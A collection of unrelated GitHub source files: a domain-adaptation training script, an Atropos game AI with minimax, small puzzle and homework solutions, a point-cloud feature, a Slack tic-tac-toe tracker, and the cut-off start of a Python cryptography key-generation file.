+{"seq_id":"12865251483","text":"# -*- coding: utf-8 -*-\n\nimport network\nimport data_loader\nimport CKButils\nimport numpy as np\nimport scipy.io as io\nfrom torch.utils import model_zoo\nimport torch\nfrom datetime import datetime\nimport sys\nimport os\nimport argparse\n\n\n##################################\n# Set Parameter\n##################################\n# Your own path\ndata_folder = './dataset' # path of dataset\nsave_folder = './results' # path for saving results\nlog_folder = './logs' # path for saving logs\nmodel_dir = './pre_model/' # path of pretrained model\n\n##################################\n# Experiment Main Function\n##################################\ndef Experiment_Main(config):\n # Parameter\n dataset = config['dataset']\n net = config['net']\n model = config['model']\n FC_dim_1 = int(config['FC_dim_1'])\n FC_dim_2 = int(config['FC_dim_2'])\n exp_times = int(config['exp_times'])\n epochs = int(config['epochs'])\n batch_size = int(config['batch_size'])\n Tar_Ent_lambda = float(config['Tar_Ent_lambda'])\n CKB_lambda = float(config['CKB_lambda'])\n CKB_type = config['CKB_type']\n Tar_Ent_epoch = int(config['Tar_Ent_epoch'])\n CKB_epoch = int(config['CKB_epoch'])\n inv_epsilon = float(config['inv_epsilon'])\n lr = float(config['lr'])\n optim_param = config['optim_param']\n \n if os.path.exists(log_folder) is False:\n os.mkdir(log_folder)\n log_name = '%1s_%1s_%1s_EntEpoch%1s_EntLam%1s_CKBEpoch%1s_CKBLam%1s_epsilon%1s_lr%1s.txt'%(dataset,net,model,Tar_Ent_epoch,Tar_Ent_lambda,CKB_epoch,CKB_lambda,inv_epsilon,lr)\n log_file = open(os.path.join(log_folder,log_name), \"w\")\n \n ##################################\n # Prepare Data\n ##################################\n if net == 'AlexNet':\n alexnet = True\n else:\n alexnet = False\n source_domain_set, target_domain_set, task_set, num_cls = data_loader.get_tasks(dataset)\n Source_Acc_Recorder = np.zeros((exp_times,len(task_set)))\n Target_Acc_Recorder = np.zeros((exp_times,len(task_set)))\n for task_iter in range(len(task_set)):\n source_domain = source_domain_set[task_iter]\n target_domain = target_domain_set[task_iter]\n task = task_set[task_iter]\n # Training loader\n source_tr_loader = data_loader.loader(dataset,data_folder,source_domain,\n batch_size,alexnet,train=True)\n target_tr_loader = data_loader.loader(dataset,data_folder,target_domain,\n batch_size,alexnet,train=True)\n # Testing loader\n source_te_loader = data_loader.loader(dataset,data_folder,source_domain,\n batch_size,alexnet,train=False)\n target_te_loader = data_loader.loader(dataset,data_folder,target_domain,\n batch_size,alexnet,train=False)\n ##################################\n # Random Experiments\n ##################################\n for exp_iter in range(exp_times):\n ##################################\n # Initialize network and optimizer\n ##################################\n # Network\n if net == 'AlexNet':\n # ImageNet pretrained AlexNet\n DNN = network.AlexNet_Feature()\n FC_input_dim = 4096\n elif net == 'ResNet-50':\n # ImageNet pretrained ResNet\n if os.path.exists(model_dir) is False:\n os.mkdir(model_dir)\n DNN = network.ResNet50(network.Bottleneck, [3, 4, 6, 3])\n FC_input_dim = 2048\n url = 'https://download.pytorch.org/models/resnet50-19c8e357.pth'\n pretrained_dict = model_zoo.load_url(url,model_dir)\n del pretrained_dict['fc.bias']\n del pretrained_dict['fc.weight']\n DNN.load_state_dict(pretrained_dict)\n del pretrained_dict\n else:\n sys.exit('Error: invalid network')\n \n FC = network.FC_Layers(FC_input_dim,FC_dim_1,FC_dim_2,num_cls)\n FC.apply(CKButils.weights_init)\n FC.cuda()\n DNN.cuda()\n \n # Optimizer\n if optim_param == 'GD':\n optimizer_dict = [{\"params\": filter(lambda p: p.requires_grad, DNN.parameters()), \"lr\": 1},\n {\"params\": filter(lambda p: p.requires_grad, FC.parameters()), \"lr\": 10}]\n optimizer = torch.optim.SGD(optimizer_dict, lr=lr, momentum=0.9, weight_decay=0.0005, nesterov=True)\n param_lr = []\n for param_group in optimizer.param_groups:\n param_lr.append(param_group[\"lr\"])\n elif optim_param == 'Adam':\n beta1=0.9\n beta2=0.999\n optimizer = torch.optim.Adam([{'params':DNN.parameters(), 'lr': lr*0.1},\n {'params':FC.parameters()}], lr*1.5,\n [beta1, beta2], weight_decay=0.01)\n else:\n sys.exit('Error: invalid optimizer')\n \n ####################\n # Training \n ####################\n iter_optim = 1\n for step in range(epochs):\n epoch_time_start = datetime.now()\n ####################\n # Mini-batch training \n ####################\n for (X_s, lab_s), (X_t, lab_t) in zip(source_tr_loader,target_tr_loader):\n # switch to training mode\n DNN.train()\n FC.train()\n \n if optim_param == 'GD':\n # upadate lr\n optimizer = CKButils.inv_lr_scheduler(param_lr, optimizer, iter_optim, init_lr=lr, gamma=0.001, power=0.75,\n weight_decay=0.0005)\n iter_optim += 1\n \n # load data\n X_s, lab_s = CKButils.to_var(X_s), CKButils.to_var(lab_s)\n X_t, lab_t = CKButils.to_var(X_t), CKButils.to_var(lab_t)\n \n # Init gradients\n DNN.zero_grad()\n FC.zero_grad()\n \n # Forward propagate\n Z_s, prob_s = FC(DNN(X_s))\n Z_t, prob_t = FC(DNN(X_t))\n plab_t = prob_t.detach().max(1)[1]\n \n # norm_s = Z_s.pow(2).detach().sum(1).pow(1/2).unsqueeze(1)\n # norm_t = Z_t.pow(2).detach().sum(1).pow(1/2).unsqueeze(1) \n # Z_s = (Z_s.mul(1/norm_s))*1e1\n # Z_t = (Z_t.mul(1/norm_t))*1e1\n \n ####################\n # Loss Objective\n ####################\n # Cross-Entropy\n CE_loss = CKButils.Cross_Entropy(prob_s, lab_s)\n \n # Entropy\n if step <= (Tar_Ent_epoch - 1):\n Tar_Ent_loss = torch.zeros(1).squeeze(0).cuda()\n else:\n Tar_Ent_loss = Tar_Ent_lambda*CKButils.Entropy(prob_t)\n \n # CKB Matching Loss\n if step <= (CKB_epoch - 1):\n Match_loss = torch.zeros(1).squeeze(0).cuda()\n else:\n if model == 'CKB':\n CKB_loss = CKB_lambda*CKButils.CKB_Metric(Z_s,Z_t,lab_s,plab_t,prob_t,num_cls,inv_epsilon,CKB_type)\n Match_loss = CKB_loss\n elif model == 'CKB+MMD':\n OneHot_s = torch.zeros(lab_s.shape[0],num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach()\n CKB_loss = CKB_lambda*CKButils.CKB_Metric(Z_s,Z_t,lab_s,plab_t,prob_t,num_cls,inv_epsilon,CKB_type)\n MMD_y_loss = CKB_lambda*CKButils.MMD_Metric(OneHot_s,prob_t)\n Match_loss = CKB_loss + MMD_y_loss\n else:\n sys.exit('Error: invalid model')\n \n # Overall Loss\n O_loss = CE_loss + Tar_Ent_loss + Match_loss\n \n # Backward propagate\n O_loss.backward()\n optimizer.step()\n torch.cuda.empty_cache()\n \n ####################\n # Testing \n ####################\n # switch to testing mode\n DNN.eval()\n FC.eval()\n # evaluate Model\n source_acc = CKButils.classification_accuracy(source_te_loader,DNN,FC)*100\n target_acc = CKButils.classification_accuracy(target_te_loader,DNN,FC)*100\n \n ####################\n # Report results\n ####################\n # time\n epoch_time_end = datetime.now()\n seconds = (epoch_time_end - epoch_time_start).seconds\n minutes = seconds//60\n second = seconds%60\n hours = minutes//60\n minute = minutes%60\n # print result\n print('====================== [%1s] %1s→%1s: Experiment %1s Epoch %1s ================='%(dataset,source_domain,target_domain,exp_iter+1,step+1))\n print('Source Accuracy: %1s'%source_acc)\n print('Target Accuracy: %1s'%target_acc)\n print('Cross-Entropy Loss: %1s'%(CE_loss.data.data.cpu().numpy()))\n print('Target Entropy Loss: %1s'%(Tar_Ent_loss.data.cpu().numpy()))\n print('Matching Loss: %1s'%(Match_loss.data.cpu().numpy()))\n print('Overall Loss: %1s'%(O_loss.data.cpu().numpy()))\n print('Current epoch [train & test] time cost: %1s Hour %1s Minutes %1s Seconds'%(hours,minute,second))\n if target_acc == 1:\n print('Reach accuracy {1} at Epoch %1s !'%(step+1))\n break\n # write log file\n log_str = '%1s | [%1s] %1s→%1s: Experiment %1s Epoch %1s, target accuracy %1s:'%(epoch_time_end,dataset,source_domain,target_domain,exp_iter+1,step+1,target_acc)\n log_file.write(log_str+'\\n')\n log_file.flush()\n # empty network cache\n torch.cuda.empty_cache()\n \n ####################\n # Record results\n ####################\n Source_Acc_Recorder[exp_iter,task_iter] = source_acc\n Target_Acc_Recorder[exp_iter,task_iter] = target_acc\n \n ####################\n # Save results\n ####################\n if os.path.exists(save_folder) is False:\n os.mkdir(save_folder)\n result_dict = config\n result_dict['Source_ACC'] = Source_Acc_Recorder\n result_dict['Target_ACC'] = Target_Acc_Recorder\n file_name = '%1s_%1s_%1s_EntEpoch%1s_EntLam%1s_CKBEpoch%1s_CKBLam%1s_epsilon%1s_lr%1s.mat'%(dataset,net,model,Tar_Ent_epoch,Tar_Ent_lambda,CKB_epoch,CKB_lambda,inv_epsilon,lr)\n \n io.savemat(os.path.join(save_folder,file_name),result_dict)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Conditional Kernel Bures Metric CVPR-2021')\n parser.add_argument('--dataset', type=str, default='ImageCLEF', choices=['ImageCLEF', 'OfficeHome', 'Office10', 'RefurbishedOffice31'])\n parser.add_argument('--net', type=str, default='ResNet-50', choices=['ResNet-50', 'AlexNet'])\n parser.add_argument('--model', type=str, default='CKB', choices=['CKB', 'CKB+MMD'])\n parser.add_argument('--FC_dim_1', type=str, default='1024', help=\"dimension of the 1st FC layer\")\n parser.add_argument('--FC_dim_2', type=str, default='512', help=\"dimension of the 2nd FC layer\")\n parser.add_argument('--exp_times', type=str, default='10', help=\"numbers of random experiment\")\n parser.add_argument('--epochs', type=str, default='150', help=\"maximum training epochs\")\n parser.add_argument('--batch_size', type=str, default='40', help=\"training batch_size; 40 for ResNet-50 and 128 for AlexNet\")\n parser.add_argument('--Tar_Ent_lambda', type=str, default='5e-2', help=\"lambda_1 in paper\")\n parser.add_argument('--CKB_lambda', type=str, default='1e0', help=\"lambda_2 in paper\")\n parser.add_argument('--CKB_type', type=str, default='soft', help=\"target soft/hard labels\")\n parser.add_argument('--Tar_Ent_epoch', type=str, default='10', help=\"training with target entropy loss after # epochs\")\n parser.add_argument('--CKB_epoch', type=str, default='5', help=\"training with CKB loss after # epochs\")\n parser.add_argument('--inv_epsilon', type=str, default='1e-2', help=\"regularization parameter of kernel matrix inverse\")\n parser.add_argument('--lr', type=str, default='2e-4', help=\"learning rate\")\n parser.add_argument('--optim_param', type=str, default='Adam', choices=['Adam', 'GD'])\n parser.add_argument('--GPU_device', type=str, nargs='?', default='0', help=\"set GPU device for training\")\n parser.add_argument('--seed', type=str, default='0', help=\"random seed\")\n args = parser.parse_args()\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.GPU_device\n \n config = {}\n config['dataset'] = args.dataset\n config['net'] = args.net\n config['model'] = args.model\n config['FC_dim_1'] = args.FC_dim_1\n config['FC_dim_2'] = args.FC_dim_2\n config['exp_times'] = args.exp_times\n config['epochs'] = args.epochs\n config['batch_size'] = args.batch_size\n config['Tar_Ent_lambda'] = args.Tar_Ent_lambda\n config['CKB_lambda'] = args.CKB_lambda\n config['CKB_type'] = args.CKB_type\n config['Tar_Ent_epoch'] = args.Tar_Ent_epoch\n config['CKB_epoch'] = args.CKB_epoch\n config['inv_epsilon'] = args.inv_epsilon\n config['lr'] = args.lr\n config['optim_param'] = args.optim_param\n config['GPU_device'] = args.GPU_device\n \n ##################################\n # Random Seeds\n ##################################\n torch.manual_seed(int(args.seed)) \n # Run experiments\n Experiment_Main(config)\n","repo_name":"LavieLuo/CKB","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14498,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"39"} +{"seq_id":"211120107","text":"# cs440 Programming Assignment 3\n# Atropos Game Playing\n# Jiatong Hao U42186937\n# Xianhui Li U16207086\n# April 25, 2018\n\nimport sys\nimport copy\n# print to stderr for debugging purposes\n# remove all debugging statements before submitting your code\nmsg = \"Given board \" + sys.argv[1] + \"\\n\"\n#sys.stderr.write(msg)\n\n# A node of an n-ary tree that stores the static evaluators\nclass Node :\n def __init__(self, value):\n self.value = value\n self.child = []\n\n#Function to print a tree\ndef printTree(root):\n if root is None:\n return \n \n sys.stderr.write(str(root.value))\n sys.stderr.write(\" \") # Seperator between levels\n queue = []\n for i in range(len(root.child)):\n sys.stderr.write(str(root.child[i].value) + \" \")\n subQueue = []\n for j in range(len(root.child[i].child)):\n subQueue.append(root.child[i].child[j].value)\n queue.append(subQueue)\n sys.stderr.write(\" \") # Seperator between levels\n for i in range(len(queue)):\n sys.stderr.write(\"||\")\n for j in range(len(queue[i])):\n sys.stderr.write(str(queue[i][j])+ \" \")\n\n#covert move = [color, height, left, right] into move_str\ndef move_to_string(move):\n move_str = \"(\" + str(move[0]) + \",\" + str(move[1]) + \",\" + str(move[2]) + \",\" + str(move[3]) + \")\"\n sys.stderr.write(move_str)\n return move_str\n\n\n#convert move = [color, height, left, right] into position in board = [row1, row2, ...]\n#returns a list: [row, col]\ndef move_to_boardpos(move):\n row = -move[1]-1\n col = move[2]\n board_pos = [row, col]\n return board_pos\n\n\n#converts a board_pos to a move\n#board_pos = [i, j]\ndef boardpos_to_move(board_pos, board):\n move = [0]\n move.append(len(board) - board_pos[0] - 1)\n move.append(board_pos[1])\n move.append(len(board[board_pos[0]]) - board_pos[1] - 1)\n return move\n\n\n#if the last move is null, we need to go first\ndef goFirst(board):\n if (len(board) % 2 != 0):\n height = len(board) // 2\n else:\n height = len(board) // 2 - 1\n row_index = len(board) - height - 1\n width = len(board[row_index])\n left = width // 2\n right = width - left - 1\n move1 = [1, height, left, right]\n move2 = [2, height, left, right]\n move3 = [3, height, left, right]\n moves = []\n moves.append(move1)\n moves.append(move2)\n moves.append(move3)\n #our_possible_moves\n return moves\n\n#get the color at a position defined by move[], color is an int\ndef color_at_boardpos(board, move):\n board_pos = move_to_boardpos(move)\n color = board[board_pos[0]][board_pos[1]]\n return color\n\n\n#find all empty spots on a board, returns a list of moves with color 0\ndef empty_spots(board):\n empty_spots = []\n for i in range(len(board)):\n for j in range(len(board[i])):\n board_pos = [i, j]\n move = boardpos_to_move(board_pos, board)\n if color_at_boardpos(board, move) == 0:\n empty_spots.append(move)\n return empty_spots\n\n\n#get the six neighbors of a move\ndef find_neighbors(board, move):\n topleft = [0, move[1]+1, move[2]-1, move[3]]\n topright = [0, move[1]+1, move[2], move[3]-1]\n left = [0, move[1], move[2]-1, move[3]+1]\n right = [0, move[1], move[2]+1, move[3]-1]\n if (move[1] == 1):\n bottomleft = [0, move[1]-1, move[2]-1, move[3]]\n bottomright = [0, move[1]-1, move[2], move[3]-1]\n else:\n bottomleft = [0, move[1]-1, move[2], move[3]+1]\n bottomright = [0, move[1]-1, move[2]+1, move[3]]\n\n all_neighbors = [topleft, topright, left, right, bottomleft, bottomright]\n return all_neighbors\n\n#find all empty spot around a move\n#neighbors is a list of list\ndef empty_neighbors(board, neighbors):\n empty_move = []\n for i in range(6):\n if color_at_boardpos(board, neighbors[i]) == 0:\n empty_move.append(neighbors[i])\n #sys.stderr.write(\"bottomright is empty\")\n #sys.stderr.write(str(empty_move))\n return empty_move\n\n#change the color into move[0] \ndef draw_on_board(board, move):\n next_board = copy.deepcopy(board)\n #get board_position\n board_pos = move_to_boardpos(move)\n next_board[board_pos[0]][board_pos[1]] = move[0]\n return next_board\n\n#check if this move will cause to lose the game\ndef will_lose(board, move):\n #get the color of neighbors of move\n current_color = color_at_boardpos(board, move)\n neighbors = find_neighbors(board, move)\n colors = []\n for i in range(6):\n color = color_at_boardpos(board, neighbors[i])\n colors.append(color)\n #sys.stderr.write(\"\\n colors: \" + str(colors))\n #check each triangle\n #upper-left triangle\n lose = False\n if (colors[0] != 0) and (colors[2] != 0):\n if (colors[0] != colors[2]) and (colors[0] != current_color) and (colors[2] != current_color):\n lose = True\n return lose\n #upper-right triangle\n if (colors[1] != 0) and (colors[3] != 0):\n if (colors[1] != colors[3]) and (colors[1] != current_color) and (colors[3] != current_color):\n lose = True\n return lose\n #lower-left triangle\n if (colors[2] != 0) and (colors[4] != 0):\n if (colors[2] != colors[4]) and (colors[2] != current_color) and (colors[4] != current_color):\n lose = True\n return lose\n #lower-right triangle\n if (colors[3] != 0) and (colors[5] != 0):\n if (colors[3] != colors[5]) and (colors[3] != current_color) and (colors[5] != current_color):\n lose = True\n return lose\n #upper triangle\n if (colors[0] != 0) and (colors[1] != 0):\n if (colors[0] != colors[1]) and (colors[0] != current_color) and (colors[1] != current_color):\n lose = True\n return lose\n #lower triangle\n if (colors[4] != 0) and (colors[5] != 0):\n if (colors[4] != colors[5]) and (colors[4] != current_color) and (colors[5] != current_color):\n lose = True\n return lose\n return lose\n\n#count the number of different colored neighboring pairs\ndef different_color_pair(board, move):\n neighbors = find_neighbors(board, move)\n count = 0\n colors = []\n for i in range(6):\n color = color_at_boardpos(board, neighbors[i])\n colors.append(color)\n if (colors[0] != 0) and (colors[1] != 0) and (colors[0] != colors[1]):\n count += 1\n if (colors[1] != 0) and (colors[3] != 0) and (colors[1] != colors[3]):\n count += 1\n if (colors[3] != 0) and (colors[5] != 0) and (colors[3] != colors[5]):\n count += 1\n if (colors[5] != 0) and (colors[4] != 0) and (colors[5] != colors[4]):\n count += 1\n if (colors[4] != 0) and (colors[2] != 0) and (colors[4] != colors[2]):\n count += 1\n if (colors[2] != 0) and (colors[0] != 0) and (colors[2] != colors[0]):\n count += 1\n return count * 2\n\n#count how many neighbors has the same color as the opponent's move\ndef same_color_neighbor(board, move):\n #get the color of all neighbors\n neighbors = find_neighbors(board, move)\n count = 0\n colors = []\n for i in range(6):\n color = color_at_boardpos(board, neighbors[i])\n colors.append(color)\n for i in range(6):\n if colors[i] != 0:\n if (move[0] == colors[i]):\n count -= 1\n return count\n\n\n#assign scores to this move according to its surroundings\n#since we are looking two steps away, the static evalution is always for the opponent's situation\ndef static_eval(board, move):\n #if the opponent will lose, high score\n score = 0\n if (will_lose(board, move)):\n score += 10\n\n #if there are few empty places, high score\n neighbors = find_neighbors(board, move)\n if len(empty_neighbors(board, neighbors))<2:\n score += 10\n\n #if there are so many empty places, high score\n if len(empty_neighbors(board, neighbors))>4:\n score += 10\n\n #if different color pairs for the opponent, high score\n different_pairs = different_color_pair(board, move)\n score += different_pairs\n \n #if opponent's move has the same color as its neighbor, low score\n score += same_color_neighbor(board, move)\n return score\n\ndef best_average(node):\n best_average = -100\n index = -1\n for i in range(len(node.child)):\n level_sum = 0\n num_child = 0\n for j in range(len(node.child[i].child)):\n level_sum += node.child[i].child[j].value\n num_child += 1\n level_average = level_sum / num_child\n if level_average > best_average:\n best_average = level_average\n index = i\n return [best_average, index]\n\n#Minimax with alpha-beta pruning\ndef minimax(node, depth, alpha, beta, isMaximizer):\n index = [-1, -1]\n if (depth == 0) or (node.child is None):\n return node.value\n if (isMaximizer):\n node.value = -1000\n for i in range(len(node.child)):\n #for aChild in node.child:\n next_value = minimax(node.child[i], depth-1, alpha, beta, False)[0]\n if (next_value > node.value):\n node.value = next_value\n index[0] = i\n alpha = max(alpha, node.value)\n if (beta <= alpha):\n break\n return [node.value, index]\n else:\n node.value = 1000\n for i in range(len(node.child)):\n node.value = min(node.value, minimax(node.child[i], depth-1, alpha, beta, True))\n beta = min(beta, node.value)\n if (beta <= alpha):\n break\n return [node.value, index]\n\n\nour_possible_moves = []\nnext_boards = []\n#parse the input string, i.e., argv[1]\n#board = [row1, row2, ...], lastmove = [color, height, left, right]\n#get board as a list from input\nboard_start = msg.find(\"[\")\nboard_end = msg.find(\"L\")\nboard_string = msg[board_start:board_end]\nlastboard = []\nfor i in range(len(board_string)):\n if (board_string[i] == \"[\"):\n board_row = []\n elif (board_string[i] == \"]\"):\n lastboard.append(board_row)\n else:\n board_row.append(int(board_string[i]))\n#sys.stderr.write(str(board))\n#get the last move of opponent\nlastmove_start = msg.find(\"(\")\n#if the last move is null, we need to go first\nif lastmove_start == -1:\n sys.stderr.write(\"We go first\")\n our_possible_moves = goFirst(lastboard)\n#get the last move of opponent as a list from input\nelse:\n lastmove_start += 1\n lastmove_string = msg[lastmove_start:-2]\n sys.stderr.write(lastmove_string)\n lastmove = [int(s) for s in lastmove_string.split(',')]\n\n #needs to look two steps forward, one for ourselves, one for the opponent\n\n #get all possible steps for ourselves\n #find all empty neighbors\n lastmove_empty_neighbors = empty_neighbors(lastboard, find_neighbors(lastboard, lastmove))\n #if there is any empty neighbors, we get all possible next steps\n if (len(lastmove_empty_neighbors) > 0):\n #sys.stderr.write(\"\\n\" + str(lastmove_empty_neighbors))\n for i in range(len(lastmove_empty_neighbors)):\n for j in range(3):\n our_possible_moves.append([j+1, lastmove_empty_neighbors[i][1], lastmove_empty_neighbors[i][2], lastmove_empty_neighbors[i][3]])\n #sys.stderr.write(\"our_possible_moves: \" + str(our_possible_moves) + \"\\n\")\n #find a empty spot to start over\n else:\n empty_spots = empty_spots(lastboard)\n for i in range(len(empty_spots)):\n for j in range(3):\n our_possible_moves.append([j+1, empty_spots[i][1], empty_spots[i][2], empty_spots[i][3]])\n\n sys.stderr.write(\"Need to pick a random spot\")\n\n\n#remove all moves that will lose in our_possible_moves\n#record the board situation after that step\nlose_move = []\nlose_board = []\nfor i in range(len(our_possible_moves)):\n next_board = draw_on_board(lastboard, our_possible_moves[i])\n #sys.stderr.write(str(next_board))\n next_boards.append(next_board)\n if (will_lose(next_board, our_possible_moves[i])):\n lose_move.append(our_possible_moves[i])\n lose_board.append(next_board)\nfor i in range(len(lose_move)):\n #sys.stderr.write(\"remove: \" + str(lose_move[i]))\n our_possible_moves.remove(lose_move[i])\n next_boards.remove(lose_board[i])\n#for i in range(len(our_possible_moves)):\n #sys.stderr.write(\"our move \" + str(i) + \": \" + str(our_possible_moves[i]) + \"\\n\")\n #sys.stderr.write(\"result board \" + str(i) + \": \" + str(next_boards[i]) + \"\\n\")\n#now our_possible_moves contains all possible moves for the next step\n\n#get the possible moves of the opponent at the next, next step\n#if not possible moves for ourselves, we lose, just pick a random position\nif (len(our_possible_moves) == 0):\n sys.stderr.write(\"We lose :(\")\n sys.stdout.write(\"(3,2,2,1)\")\n#get the possible moves of the opponent at the next, next step\n#opponent_moves = [[moves[0], move[3], next_board]]\nelse: \n all_possible_opponent = []\n for i in range(len(our_possible_moves)):\n ourmove_empty_neighbors = empty_neighbors(next_boards[i], find_neighbors(next_boards[i], our_possible_moves[i]))\n #if there are empty spots for the opponent, predict his moves\n if (len(ourmove_empty_neighbors) > 0):\n one_possible_opponent = []\n #get all possible moves of the opponent\n opponent_possible_moves = []\n opponent_boards = []\n for j in range(len(ourmove_empty_neighbors)):\n for k in range(3):\n opponent_possible_moves.append([k+1, ourmove_empty_neighbors[j][1], ourmove_empty_neighbors[j][2], ourmove_empty_neighbors[j][3]])\n one_possible_opponent.append(opponent_possible_moves)\n #get the board situation after each possible moves of the opponent\n for j in range(len(opponent_possible_moves)):\n next_oppo_board = draw_on_board(next_boards[i], opponent_possible_moves[j])\n opponent_boards.append(next_oppo_board)\n one_possible_opponent.append(opponent_boards)\n #sys.stderr.write(\"one_possible_opponent for our move: \" + str(i) + str(one_possible_opponent) + \"\\n\")\n all_possible_opponent.append(one_possible_opponent)\n #else it means that no empty neighbor for the opponent\n else:\n #sys.stderr.write(\"No possible moves for the opponent\")\n all_possible_opponent.append([\"no move\"])\n #a move: all_possible_opponet[i][0][j] <-> a board: all_possible_opponent[i][1][j]\n\n\n #compute static score for each all_possible_opponent\n score_tree = Node(0)\n for i in range(len(all_possible_opponent)):\n score_tree.child.append(Node(0))\n #if the opponent has possible moves, evaluate the situation\n if (all_possible_opponent[i] != [\"no move\"]):\n for j in range(len(all_possible_opponent[i][0])):\n #sys.stderr.write(\"opponent possible move for our move \" + str(i) + str(all_possible_opponent[i][0][j]) + \"\\n\")\n #sys.stderr.write(\"opponent possible board for our move \" + str(i) + str(all_possible_opponent[i][1][j]) + \"\\n\")\n #after we move, if the opponent has only one possible move and that leads to losing, we take that step\n if (len(all_possible_opponent[i][0]) == 1) and will_lose(all_possible_opponent[i][1][0], all_possible_opponent[i][0][0]):\n best_move = our_possible_moves[i]\n best_move_string = move_to_string(best_move)\n sys.stdout.write(best_move_string)\n else:\n score = static_eval(all_possible_opponent[i][1][j], all_possible_opponent[i][0][j])\n if (len(all_possible_opponent[i][0]) <= 3):\n score += 3\n score_tree.child[i].child.append(Node(score))\n #else means the opponent needs to finds an empty space, give a score of zero\n else:\n sys.stderr.write(\"no move\")\n score = 0\n score_tree.child[i].child.append(Node(score))\n #printTree(score_tree)\n #best_outcome = [best_score, [index[0], index[1]]]\n best_outcome = minimax(score_tree, 2, -1000, +1000, True)\n best_move_index = best_outcome[1][0]\n #best_outcome = best_average(score_tree)\n #best_move_index = best_outcome[1]\n best_move = our_possible_moves[best_move_index]\n best_move_string = move_to_string(best_move)\n sys.stdout.write(best_move_string)\n\n\n","repo_name":"LenkaHao/Introduction-to-AI","sub_path":"Atropos/jthaoPlayer.py","file_name":"jthaoPlayer.py","file_ext":"py","file_size_in_byte":16446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"6977479016","text":"# https://www.acmicpc.net/problem/16987\n# 계란으로 계란치기\nimport sys\ninput = sys.stdin.readline\n\n\ndef backTracking(start):\n global result\n if start == n: # 맨 마지막 계란까지 탐색한 경우\n count = 0\n for i in range(n):\n if egg[i][0] <= 0:\n count += 1\n result = max(result, count)\n return\n\n if egg[start][0] <= 0: # 계란을 깰 수 없는 경우\n backTracking(start + 1)\n return\n\n check = True # 모두 깨졌는 지 확인\n for i in range(n):\n if i == start:\n continue\n if egg[i][0] > 0:\n check = False\n break\n\n if check:\n result = max(result, n - 1)\n return\n\n for i in range(n):\n if start != i and egg[i][0] > 0:\n egg[start][0] -= egg[i][1]\n egg[i][0] -= egg[start][1]\n backTracking(start + 1)\n egg[start][0] += egg[i][1]\n egg[i][0] += egg[start][1]\n\n\nn = int(input())\negg = [list(map(int, input().split())) for _ in range(n)]\nresult = 0\n\nbackTracking(0)\nprint(result)\n","repo_name":"youngeun-dev/coding-test-practice","sub_path":"python/16987.py","file_name":"16987.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16985373847","text":"import numpy as np\nfrom features.feature import ScalableFeature\nfrom features.helpers import dist # , mean_dist\n\n#####\n# OBS: must normalize point clouds before saving them to use this feature!\n#####\n\nclass kNNMaxDistance(ScalableFeature):\n def run_at_scale(self, scale:float, knn_scale:int):\n labels = np.zeros(self.state.points.shape[0])\n\n for point_i, point in enumerate(self.state.points):\n [_, idx, _] = self.state.kd_tree.search_knn_vector_3d(point, knn_scale + 1)\n labels[point_i] = dist(point, self.state.points[idx[-1]])\n\n labels *= self.state.downsampling_factor\n\n return labels\n \n\n\n\n","repo_name":"appfr3d/TBA4925-Masters-thesis","sub_path":"edge_detection/features/knn_max_distance.py","file_name":"knn_max_distance.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"1030109507","text":"# Dadas dos variables numéricas A y B, que el usuario debe teclear, se pide realizar un\n#algoritmo que intercambie los valores de ambas variables y muestre cuanto valen al\n#final las dos variables (recuerda la asignación). \n\nprint(\"Ingrese el valor de A\")\na=int(input())\nprint(\"Ingrese el valor de B\")\nb=int(input())\n\nc=a\na=b\nb=c\nprint(f\"el nuevo valor de A es: {a} ,y el nuevo valor de B es: {b}\")\n\n","repo_name":"wilsonestrada1974/momento1_nuevas_tecnologias","sub_path":"ejercicio1.py","file_name":"ejercicio1.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"3118122568","text":"# container to store data about ongoing games\n# format:\n'''\n channels : {\n\tchannel_id: {\n\t\t'ongoing': BOOLEAN,\n\t\t'players': ARRAY,\n\t\t'winner': STRING,\n\t\t'turn': players[0], // initializing to the first player\n\t\t'board': [\":one:\", \":two:\", \":three:\", \":four:\", \":five:\", \":six:\", \":seven:\", \":eight:\", \":nine:\"]\n\t}\n}\n'''\nchannels = {}\n\n# function to see if a game is ongoing or not\ndef can_start_game(channel):\n\tif channel in channels:\n\t\t# can't start a game if there is one already ongoing in this channel\n\t\tif (channels[channel]['ongoing']):\n\t\t\treturn(False)\n\telse:\n\t\t# if it's the first time a game is getting created in a channel,\n\t\t# initialize an empty dict\n\t\tchannels[channel] = {}\n\treturn(True)\n\ndef start_game(channel, player_one, player_two):\n\t# initializing channel variables when starting the game\n\tchannels[channel]['ongoing'] = True\n\tchannels[channel]['players'] = []\n\tchannels[channel]['players'].append(player_one)\n\tchannels[channel]['players'].append(player_two)\n\tchannels[channel]['winner'] = \"\"\n\tchannels[channel]['turn'] = player_one\n\tchannels[channel]['board'] = [\":one:\", \":two:\", \":three:\", \":four:\", \":five:\", \":six:\", \":seven:\", \":eight:\", \":nine:\"]\n\ndef allowed_to_make_move(channel, player):\n\t# makes sure the user is one of the players in this particular game\n\t# AND it's the user's turn to make a move\n\treturn (player in channels[channel]['players'] and channels[channel]['turn'] == player)","repo_name":"michello/slack-tic-tac-toe","sub_path":"tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"21486709465","text":"import os\nfrom cryptography.hazmat.primitives.asymmetric import rsa, padding\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.primitives import padding\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.serialization import load_pem_public_key, load_pem_private_key\n\nsym_key = None\n\n\ndef generation_symmetric_key() -> bytes:\n \"\"\"\n 